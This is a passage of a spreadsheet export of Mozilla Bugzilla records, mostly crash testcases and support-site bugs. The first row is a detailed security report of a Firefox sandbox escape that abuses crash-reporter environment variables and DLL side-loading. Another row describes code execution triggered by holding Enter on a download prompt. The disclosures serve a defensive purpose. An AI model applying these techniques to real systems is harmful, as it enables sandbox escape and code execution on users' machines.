        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O272" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P272" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main124+][adv-esr115.9+]</t>
        </is>
      </c>
      <c r="Q272" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R272" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S272" t="inlineStr">
        <is>
          <t>125 Branch</t>
        </is>
      </c>
      <c r="T272" t="n">
        <v>1</v>
      </c>
      <c r="U272" t="n">
        <v>0</v>
      </c>
      <c r="V272" t="n">
        <v>63</v>
      </c>
      <c r="W272" t="inlineStr">
        <is>
          <t>Created attachment 9370940
vn0027.patch
# Sandbox escape via process type confusion in mozwer
TL;DR: A compromised content process on Windows 10 &amp; Windows 11 can pretend to be a browser process, which will lead the `mozwer` module to spawn a `crashreporter.exe` process that inherits environment variables from the content process. By controlling these environment variables, the content process can execute arbitrary code from within the crash reporter and escape the sandbox.
## Details
When one of the firefox processes throws an exception that must be handled out-of-process, a WER (Windows Error Reporting) process is spawned, which loads `mozwer.dll` and executes [OutOfProcessExceptionEventCallback](https://searchfox.org/mozilla-central/source/toolkit/crashreporter/mozwer-rust/lib.rs#80).  At the end of this function, there's an attempt to determine whether the exception-throwing process is a browser process or a content process:
```
let wer_data = read_from_process::&lt;InProcessWindowsErrorReportingData&gt;(
    process,
    context as *mut InProcessWindowsErrorReportingData,
)?;
...
if wer_data.process_type == MAIN_PROCESS_TYPE {
    handle_main_process_crash(crash_report, process, &amp;application_info)
} else {
    handle_child_process_crash(crash_report, process)
}
```
Where the `context` variable contains the address of the [gInProcessWerData](https://searchfox.org/mozilla-central/source/mozglue/misc/RuntimeExceptionModule.cpp#43) structure residing in the memory of the crashing process:
```
void RegisterRuntimeExceptionModule() {
...
gInProcessWerData.mProcessType = mozilla::GetGeckoProcessType();
gInProcessWerData.mOOMAllocationSizePtr = &amp;gOOMAllocationSize;
if (FAILED(::WerRegisterRuntimeExceptionModule(sModulePath,
                                                 &amp;gInProcessWerData))) {
    // The registration failed null out sModulePath to record this.
    *sModulePath = L'\0';
    return;
}
...
}
```
Since `wer_data` is read from the memory of the crashing process, a content process can pose as a browser process by simply modifying `gInProcessWerData.mProcessType` within its own memory. Once that happens, `handle_main_process_crash` will be executed instead of `handle_child_process_crash`. This execution path launches the crash reporter:
```
...
let mut environment = read_environment_block(process)?;
launch_crash_reporter_client(
    &amp;application_information.install_path,
    &amp;mut environment,
    &amp;crash_report,
);
...
```
```
fn launch_crash_reporter_client(
    install_path: &amp;Path,
    environment: &amp;mut Vec&lt;u16&gt;,
    crash_report: &amp;CrashReport,
) {
...
unsafe {
    if CreateProcessW(
        null_mut(),
        cmd_line.as_mut_ptr(),
        null_mut(),
        null_mut(),
        FALSE,
        NORMAL_PRIORITY_CLASS | CREATE_NO_WINDOW | CREATE_UNICODE_ENVIRONMENT,
        environment.as_mut_ptr() as *mut _,
        null_mut(),
        &amp;mut si,
        &amp;mut pi,
    ) != 0
    {
        CloseHandle(pi.hProcess);
        CloseHandle(pi.hThread);
    }
}
}
```
When launching the crash reporter, the environment variables are inherited from the crashing process.  As such, a content process can set its own environment variables and have them also be set in the launched crash reporter process. By controlling the environment variables inside the crash reporter process, there are multiple paths that a content process could use to achieve arbitrary code exec from the crash reporter (thus, outside the sandbox):
* By abusing the `MOZ_CRASHREPORTER_RESTART_ARG_*` environment variables. These environment variables are used to determine the command line that should be executed in order to restart firefox. For example, by setting `MOZ_CRASHREPORTER_RESTART_ARG_0=path//to//some//executable`, `MOZ_CRASHREPORTER_RESTART_ARG_1=some_arg_1` etc., the crash reporter can be made to execute an arbitrary file present on the system with arbitrary command line arguments. However, user interaction is required, as this code path is only triggered once "Restart" is pressed by the user. Note that the attacker can confuse/convince the user to press the "Restart" button by abusing the `MOZ_CRASHREPORTER_STRINGS_OVERRIDE` environment variable, which allows the attacker to control the text (and thus the layout) of the crash reporter window.
* By abusing the `MOZ_REPLACE_MALLOC_LIB` environment variable. Setting `MOZ_REPLACE_MALLOC_LIB=path//to//some//library` will make the crash reporter process load the specified library on boot. This could be used in conjunction with other vulnerabilities (e.g. allowing the attacker to plant a malicious library file somewhere on the system), but it could also be used stand-alone (e.g. specifying a UNC share path on an SMB-enabled machine, or using a vulnerable library to trigger a vulnerability and continue from there). No interaction is required here.
* By abusing the `SystemRoot` environment variable. This is similar to the case above, in that `SystemRoot` can be hijacked to side-load DLLs whose full path is resolved using this variable. Certain dependencies of the crash reporter load their DLLs by using this environment variable (e.g. `%SystemRoot%\system32\rpcrt4.dll`), making it possible to abuse this behaviour.
## Fix
To fix the issue, you need to ensure that `mozwer` doesn't trust the content process to be truthful about its process type, i.e. this  information should come from somewhere unreachable to the content process. I'm not familiar with all the intrinsics of the underlying implementation, but querying the process' command line parameters (as is already being done in the child process crash code path) to determine its type would be a more suitable check, as the process cannot directly affect this.
## Proof of Concept &amp; Repro Steps
We assume that a content process has been fully compromised and can execute arbitrary code. The proof of concept consist of:
* The "payload" function that's executed from the content process and performs the steps necessary to trigger the sandbox escape:
    * Set `gInProcessWerData.mProcessType` to `GeckoProcessType_Default` to pose as a browser process to `mozwer`.
    * Setup the appropriate environment variables for code execution. Depending on the choice of option, one of the aforementioned methods is used. The first method is chosen by default, with `calc.exe` being the command line to execute.
    * Trigger a crash that needs to be handled OOP by WER. For example, we use a classic stack-based buffer overflow, which will be detected by the stack protector and throw out a stack corruption exception.
* A hook inside of the `console.time()` method implementation that's used to trigger the payload function via a crafted HTML file. This part is irrelevant to the vulnerability and the exploit and is used solely for demonstration purposes.
To reproduce the issue:
- Apply the attached `vn0027.patch` as a git patch in the root directory of firefox source.
    - `git apply /path/to/vn0027.patch`
- Build firefox.
- Ensure that local `mozwer.dll` has been registered as a WER exception handler module:
    + `HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\RuntimeExceptionHelperModules` contains a `path/to/mozwer.dll` DWORD entry with value 0.
- Ensure that crash reporter files/folders have been properly setup in `%APPDATA%\Roaming\Mozilla\Firefox\Crash Reports`:
    - There is an InstallTime file corresponding to the firefox build number/timestamp that was built earlier.
    - The `pending` folder exists.
- Grab the attached `vn0027.html`. Start a local http server in the directory where `vn0027.html` resides: 
    - `python3 -m http.server`
- Open previously-built firefox and navigate to `localhost:8000/vn0027.html`.
- Observe that firefox shows that the tab crashed.
- Observe that `crashreporter.exe` is executed and the crash reporter window is shown. Observe that the process inherited environment variables from the content process corresponding to the html file that was opened earlier. (You can observe this via e.g. process explorer)
- Observe that pressing "Restart" spawns `calc.exe` (in case the first method is used for code exec), or a specified library has been loaded into `crashreporter.exe` (if using the second or third method for code exec).
**NOTE**: I couldn't get `mozwer` to work on Windows 10 Pro 22H2 (19045.3803), though it could be a local issue. During DLL loading, the process attempts to load `user32.dll` as one of the dependencies of `mozwer.dll` and this throws out a 0xC0000135 error. Everything works as expected on a clean latest Windows 11 insider build, so I recommend using that to test, should you run into any issues on your regular setup.
## IMPORTANT
It is very important to mention that the impact of the vulnerability extends beyond firefox. Since `mozwer.dll` is registered as a WER exception handler module in the registry, any (non-firefox) sandboxed process on the system can use it via `WerRegisterRuntimeExceptionModule("path/to/mozwer.dll", ...)` and escape its sandbox using this vulnerability. This virtually means that having firefox installed on the system makes it possible to escape from any sandboxed process running on the system.
Let me know if any further information is required. I won't be dedicating more time to this issue, unless requested.</t>
        </is>
      </c>
      <c r="X272" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="273">
      <c r="A273" t="n">
        <v>457514</v>
      </c>
      <c r="B273" t="inlineStr">
        <is>
          <t>2008-09-28 01:41:11 -0700</t>
        </is>
      </c>
      <c r="C273" t="inlineStr">
        <is>
          <t>Crash [@ NeedFrameFor] with floating :first-letter</t>
        </is>
      </c>
      <c r="D273" t="inlineStr">
        <is>
          <t>2013-02-23 17:09:04 -0800</t>
        </is>
      </c>
      <c r="E273" t="n">
        <v>1</v>
      </c>
      <c r="F273" t="n">
        <v>1</v>
      </c>
      <c r="G273" t="n">
        <v>3</v>
      </c>
      <c r="H273" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I273" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J273" t="inlineStr">
        <is>
          <t>Layout: Floats</t>
        </is>
      </c>
      <c r="K273" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L273" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M273" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N273" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O273" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P273" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q273" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R273" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S273" t="inlineStr">
        <is>
          <t>mozilla1.9.2</t>
        </is>
      </c>
      <c r="T273" t="n">
        <v>1</v>
      </c>
      <c r="U273" t="n">
        <v>0</v>
      </c>
      <c r="V273" t="n">
        <v>22</v>
      </c>
      <c r="W273" t="inlineStr">
        <is>
          <t>Created attachment 340777
testcase
This testcase triggers
###!!! ASSERTION: Should have Reset() before destruction!: 'mCurrentWord.Length() == 0', file /Users/jruderman/central/content/base/src/nsLineBreaker.cpp, line 51
(like bug 448615), then crashes [@ NeedFrameFor].</t>
        </is>
      </c>
      <c r="X273" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="274">
      <c r="A274" t="n">
        <v>610450</v>
      </c>
      <c r="B274" t="inlineStr">
        <is>
          <t>2010-11-08 12:14:26 -0800</t>
        </is>
      </c>
      <c r="C274" t="inlineStr">
        <is>
          <t>Update video presentation</t>
        </is>
      </c>
      <c r="D274" t="inlineStr">
        <is>
          <t>2010-11-17 15:41:48 -0800</t>
        </is>
      </c>
      <c r="E274" t="n">
        <v>1</v>
      </c>
      <c r="F274" t="n">
        <v>1</v>
      </c>
      <c r="G274" t="n">
        <v>5</v>
      </c>
      <c r="H274" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I274" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J274" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K274" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L274" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M274" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N274" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O274" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P274" t="inlineStr"/>
      <c r="Q274" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R274" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S274" t="inlineStr">
        <is>
          <t>2.3</t>
        </is>
      </c>
      <c r="T274" t="n">
        <v>1</v>
      </c>
      <c r="U274" t="n">
        <v>0</v>
      </c>
      <c r="V274" t="n">
        <v>13</v>
      </c>
      <c r="W274" t="inlineStr">
        <is>
          <t>1. When videos are included in documents, just show them instead of having a slide-out button.
2. Since Flash videos are not required in the upload form, if there is no Flash fallback, show a message. Michael, you can comment here with the message you'd like.</t>
        </is>
      </c>
      <c r="X274" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="275">
      <c r="A275" t="n">
        <v>246448</v>
      </c>
      <c r="B275" t="inlineStr">
        <is>
          <t>2004-06-11 21:03:15 -0700</t>
        </is>
      </c>
      <c r="C275" t="inlineStr">
        <is>
          <t>can spoof framed sites by changing frame contents</t>
        </is>
      </c>
      <c r="D275" t="inlineStr">
        <is>
          <t>2013-06-09 18:54:05 -0700</t>
        </is>
      </c>
      <c r="E275" t="n">
        <v>1</v>
      </c>
      <c r="F275" t="n">
        <v>1</v>
      </c>
      <c r="G275" t="n">
        <v>3</v>
      </c>
      <c r="H275" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I275" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J275" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K275" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L275" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M275" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N275" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O275" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P275" t="inlineStr">
        <is>
          <t>[sg:fix] fixed-aviary1.0</t>
        </is>
      </c>
      <c r="Q275" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R275" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S275" t="inlineStr">
        <is>
          <t>mozilla1.7final</t>
        </is>
      </c>
      <c r="T275" t="n">
        <v>1</v>
      </c>
      <c r="U275" t="n">
        <v>0</v>
      </c>
      <c r="V275" t="n">
        <v>71</v>
      </c>
      <c r="W275" t="inlineStr">
        <is>
          <t>This security hole lets an attacker spoof any site that uses frames.
It is like bug 13871 and bug 20682 (in fact, it is a regression of the first). 
I don't know if it regressed due to the fix for bug 52920 or if it regressed
somewhere else.</t>
        </is>
      </c>
      <c r="X275" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="276">
      <c r="A276" t="n">
        <v>428113</v>
      </c>
      <c r="B276" t="inlineStr">
        <is>
          <t>2008-04-09 15:55:54 -0700</t>
        </is>
      </c>
      <c r="C276" t="inlineStr">
        <is>
          <t>[Win &amp; Mac only] Crash [@ nsHTMLReflowState::GetNearestContainingBlock] with xul:listbox, position:absolute</t>
        </is>
      </c>
      <c r="D276" t="inlineStr">
        <is>
          <t>2014-10-20 06:00:12 -0700</t>
        </is>
      </c>
      <c r="E276" t="n">
        <v>1</v>
      </c>
      <c r="F276" t="n">
        <v>1</v>
      </c>
      <c r="G276" t="n">
        <v>3</v>
      </c>
      <c r="H276" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I276" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J276" t="inlineStr">
        <is>
          <t>Layout: Positioned</t>
        </is>
      </c>
      <c r="K276" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L276" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M276" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N276" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O276" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P276" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q276" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R276" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S276" t="inlineStr">
        <is>
          <t>mozilla1.9.1b3</t>
        </is>
      </c>
      <c r="T276" t="n">
        <v>1</v>
      </c>
      <c r="U276" t="n">
        <v>0</v>
      </c>
      <c r="V276" t="n">
        <v>29</v>
      </c>
      <c r="W276" t="inlineStr">
        <is>
          <t>Created attachment 314716
testcase
The following testcase crashes Firefox with a null dereference @ nsHTMLReflowState::GetNearestContainingBlock.
Asserts first at 
###!!! ASSERTION: Placeholder relationship should have been torn down; see comments in nsPlaceholderFrame.h: '!shell-&gt;FrameManager()-&gt;GetPlaceholderFrameFor(mOutOfFlowFrame)', file /Users/skywalker/Desktop/Mozilla/cvs/mozilla/layout/generic/nsPlaceholderFrame.cpp, line 132
then at
###!!! ASSERTION: Dead placeholder in placeholder map: 'entry-&gt;placeholderFrame-&gt;GetOutOfFlowFrame() != (void*)0xdddddddd', file /Users/skywalker/Desktop/Mozilla/cvs/mozilla/layout/base/nsFrameManager.cpp, line 136
and finally at
###!!! ASSERTION: no placeholder frame: 'nsnull != placeholderFrame', file /Users/skywalker/Desktop/Mozilla/cvs/mozilla/layout/generic/nsHTMLReflowState.cpp, line 1082
Testcase is derived from crashtest in bug 354771.
Related to bug 398332?</t>
        </is>
      </c>
      <c r="X276" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="277">
      <c r="A277" t="n">
        <v>956063</v>
      </c>
      <c r="B277" t="inlineStr">
        <is>
          <t>2014-01-02 07:45:57 -0800</t>
        </is>
      </c>
      <c r="C277" t="inlineStr">
        <is>
          <t>[traceback] 'NoneType' object has no attribute 'get_profile' (kbforums)</t>
        </is>
      </c>
      <c r="D277" t="inlineStr">
        <is>
          <t>2014-01-02 08:29:09 -0800</t>
        </is>
      </c>
      <c r="E277" t="n">
        <v>1</v>
      </c>
      <c r="F277" t="n">
        <v>1</v>
      </c>
      <c r="G277" t="n">
        <v>5</v>
      </c>
      <c r="H277" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I277" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J277" t="inlineStr">
        <is>
          <t>Forum</t>
        </is>
      </c>
      <c r="K277" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L277" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M277" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N277" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O277" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P277" t="inlineStr">
        <is>
          <t>u=contributors c=kbforums p=1 s=2013.25</t>
        </is>
      </c>
      <c r="Q277" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R277" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S277" t="inlineStr">
        <is>
          <t>2014Q1</t>
        </is>
      </c>
      <c r="T277" t="n">
        <v>1</v>
      </c>
      <c r="U277" t="n">
        <v>0</v>
      </c>
      <c r="V277" t="n">
        <v>6</v>
      </c>
      <c r="W277" t="inlineStr">
        <is>
          <t>Internal Server Error: /en-US/kb/troubleshoot-firefox-issues-using-safe-mode/discuss/2103
Stacktrace (most recent call last):
  File "django/core/handlers/base.py", line 111, in get_response
    response = callback(request, *callback_args, **callback_kwargs)
  File "newrelic/api/object_wrapper.py", line 216, in __call__
    self._nr_instance, args, kwargs)
  File "newrelic/hooks/framework_django.py", line 475, in wrapper
    return wrapped(*args, **kwargs)
  File "kitsune/kbforums/views.py", line 116, in posts
    'feeds': feed_urls})
  File "django/shortcuts/__init__.py", line 44, in render
    return HttpResponse(loader.render_to_string(*args, **kwargs),
  File "django/template/loader.py", line 176, in render_to_string
    return t.render(context_instance)
  File "jingo/__init__.py", line 193, in render
    return super(Template, self).render(context_dict)
  File "newrelic/api/object_wrapper.py", line 216, in __call__
    self._nr_instance, args, kwargs)
  File "newrelic/api/function_trace.py", line 82, in dynamic_wrapper
    return wrapped(*args, **kwargs)
  File "jinja2/environment.py", line 891, in render
    return self.environment.handle_exception(exc_info, True)
  File "/data/www/support.mozilla.org/kitsune/kitsune/kbforums/templates/kbforums/posts.html", line 11, in top-level template code
    {% set scripts = ('forums', 'libs/jqueryui') %}
  File "/data/www/support.mozilla.org/kitsune/kitsune/kbforums/templates/kbforums/base.html", line 10, in top-level template code
    {% set meta = (('robots', 'noindex'),) %}
  File "/data/www/support.mozilla.org/kitsune/kitsune/sumo/templates/base.html", line 176, in top-level template code
    {% block content %}{% endblock %}
  File "/data/www/support.mozilla.org/kitsune/kitsune/kbforums/templates/kbforums/posts.html", line 69, in block "content"
    {% include "kbforums/includes/post.html" %}
  File "/data/www/support.mozilla.org/kitsune/kitsune/kbforums/templates/kbforums/includes/post.html", line 43, in top-level template code
    {{ _('Modified by {name} on {datetime}')|fe(name=display_name(post.updated_by), datetime=datetimeformat(post.updated, format='longdatetime')) }}
  File "kitsune/users/helpers.py", line 50, in display_name
    profile = user.get_profile()</t>
        </is>
      </c>
      <c r="X277" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="278">
      <c r="A278" t="n">
        <v>644859</v>
      </c>
      <c r="B278" t="inlineStr">
        <is>
          <t>2011-03-24 17:28:39 -0700</t>
        </is>
      </c>
      <c r="C278" t="inlineStr">
        <is>
          <t>Search doesn't find questions tagged with OS names</t>
        </is>
      </c>
      <c r="D278" t="inlineStr">
        <is>
          <t>2012-06-25 07:19:09 -0700</t>
        </is>
      </c>
      <c r="E278" t="n">
        <v>1</v>
      </c>
      <c r="F278" t="n">
        <v>1</v>
      </c>
      <c r="G278" t="n">
        <v>5</v>
      </c>
      <c r="H278" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I278" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J278" t="inlineStr">
        <is>
          <t>Search</t>
        </is>
      </c>
      <c r="K278" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L278" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M278" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N278" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O278" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P278" t="inlineStr">
        <is>
          <t>u=contributor c=search p=1</t>
        </is>
      </c>
      <c r="Q278" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R278" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S278" t="inlineStr">
        <is>
          <t>2012.12</t>
        </is>
      </c>
      <c r="T278" t="n">
        <v>1</v>
      </c>
      <c r="U278" t="n">
        <v>0</v>
      </c>
      <c r="V278" t="n">
        <v>7</v>
      </c>
      <c r="W278" t="inlineStr">
        <is>
          <t>https://support.mozilla.com/en-US/search?q=&amp;is_locked=0&amp;num_voted=0&amp;num_votes=&amp;asked_by=&amp;answered_by=&amp;q_tags=Mac+OS+X+10.6&amp;created=2&amp;created_date=03%2F20%2F2011&amp;updated=0&amp;updated_date=&amp;sortby=3&amp;a=1&amp;w=2
and 
https://support.mozilla.com/en-US/search?q=&amp;is_locked=0&amp;num_voted=0&amp;num_votes=&amp;asked_by=&amp;answered_by=&amp;q_tags=Windows+7&amp;created=2&amp;created_date=03%2F20%2F2011&amp;updated=0&amp;updated_date=&amp;sortby=3&amp;a=1&amp;w=2
return nothing
I expect them to return questions from those OSes.</t>
        </is>
      </c>
      <c r="X278" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="279">
      <c r="A279" t="n">
        <v>657462</v>
      </c>
      <c r="B279" t="inlineStr">
        <is>
          <t>2011-05-16 13:56:52 -0700</t>
        </is>
      </c>
      <c r="C279" t="inlineStr">
        <is>
          <t>Holding enter allows arbitrary code execution due to Download Manager</t>
        </is>
      </c>
      <c r="D279" t="inlineStr">
        <is>
          <t>2024-05-29 15:55:46 -0700</t>
        </is>
      </c>
      <c r="E279" t="n">
        <v>1</v>
      </c>
      <c r="F279" t="n">
        <v>1</v>
      </c>
      <c r="G279" t="n">
        <v>3</v>
      </c>
      <c r="H279" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I279" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J279" t="inlineStr">
        <is>
          <t>Downloads API</t>
        </is>
      </c>
      <c r="K279" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L279" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M279" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N279" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O279" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P279" t="inlineStr">
        <is>
          <t xml:space="preserve">[sg:critical][qa!] semi-public :-( </t>
        </is>
      </c>
      <c r="Q279" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R279" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S279" t="inlineStr">
        <is>
          <t>mozilla10</t>
        </is>
      </c>
      <c r="T279" t="n">
        <v>1</v>
      </c>
      <c r="U279" t="n">
        <v>0</v>
      </c>
      <c r="V279" t="n">
        <v>75</v>
      </c>
      <c r="W279" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Build Identifier: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
It is possible to execute an arbitrary code in the context of user's operating system if a user holds Enter for about 1-2 seconds. Consider the attached example -- a file download prompt pops up and a user has only about a second to react (with the default Firefox settings -- it could be a fraction of second more if the option to always ask where to save files was explicitly selected). If they keep holding Enter and there was no "Downloads" window on the task bar prior to the prompt (thus the newly appearing "Downloads" window with the malicious file highlighted gains focus), an arbitrary code will be executed. No user interaction other than holding Enter is needed for a successful exploitation of this issue. The windows appear in a very brief instant and an attacker can use a number of methods to easily distract user's attention to make them hold the crucial key a fraction of second longer.
I think that the primary problem here is that the keyboard buffer isn't maintained correctly when the download prompt gains focus. It should be flushed and no new keys should be registered until after all keys are released.
Reproducible: Always
Steps to Reproduce:
1. Open script.htm
2. Press and hold Enter.
Actual Results:  
calc.exe starts.
Expected Results:  
No file should be launched without an explicit consent from the user.
The attached example has been verified to launch calc.exe in Firefox 4.0.1 on Windows 7 SP1 64-bit and Windows XP SP2 32-bit.</t>
        </is>
      </c>
      <c r="X279" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="280">
      <c r="A280" t="n">
        <v>906301</v>
      </c>
      <c r="B280" t="inlineStr">
        <is>
          <t>2013-08-17 03:22:35 -0700</t>
        </is>
      </c>
      <c r="C280" t="inlineStr">
        <is>
          <t>Memory corruption in nsGfxScrollFrameInner::IsLTR()</t>
        </is>
      </c>
      <c r="D280" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E280" t="n">
        <v>1</v>
      </c>
      <c r="F280" t="n">
        <v>1</v>
      </c>
      <c r="G280" t="n">
        <v>3</v>
      </c>
      <c r="H280" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I280" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J280" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K280" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L280" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M280" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N280" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O280" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P280" t="inlineStr">
        <is>
          <t>[asan][adv-main24+][adv-esr1709+]</t>
        </is>
      </c>
      <c r="Q280" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R280" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S280" t="inlineStr">
        <is>
          <t>mozilla26</t>
        </is>
      </c>
      <c r="T280" t="n">
        <v>1</v>
      </c>
      <c r="U280" t="n">
        <v>0</v>
      </c>
      <c r="V280" t="n">
        <v>24</v>
      </c>
      <c r="W280" t="inlineStr">
        <is>
          <t>Created attachment 791654
crash.zip
The attached testcase crashes Firefox stable and nightly. The testcase is attached in a zip file as it requires multiple files to trigger.
The debugger output on windows:
eax=0101020d ebx=00000000 ecx=00020000 edx=0000000f esi=0018e260 edi=0018e1d4
eip=645f875d esp=0018e148 ebp=0a154aa0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210202
xul!nsGfxScrollFrameInner::IsLTR+0x1d:
645f875d 803801          cmp     byte ptr [eax],1           ds:0023:0101020d=??
xul!nsGfxScrollFrameInner::IsLTR+0x1d
xul!nsHTMLScrollFrame::ReflowContents+0x145
xul!nsHTMLScrollFrame::Reflow+0x210
xul!nsContainerFrame::ReflowChild+0x5a
xul!ViewportFrame::Reflow+0x1e8
xul!PresShell::DoReflow+0x418
xul!PresShell::ProcessReflowCommands+0x166
xul!PresShell::FlushPendingNotifications+0x3ef
xul!nsRefreshDriver::Tick+0x29f
xul!mozilla::RefreshDriverTimer::Tick+0x102
xul!nsTimerImpl::Fire+0xe7
xul!nsThread::ProcessNextEvent+0x362
xul!NS_ProcessNextEvent+0x2e
xul!mozilla::ipc::MessagePump::Run+0x46
xul!MessageLoop::RunHandler+0x51
xul!MessageLoop::Run+0x19
xul!nsBaseAppShell::Run+0x2c
xul!nsAppShell::Run+0x14
xul!XREMain::XRE_mainRun+0x3a9
xul!XREMain::XRE_main+0xdc
ASAN on Linux doesn't give us any further information:
ASAN:SIGSEGV
=================================================================
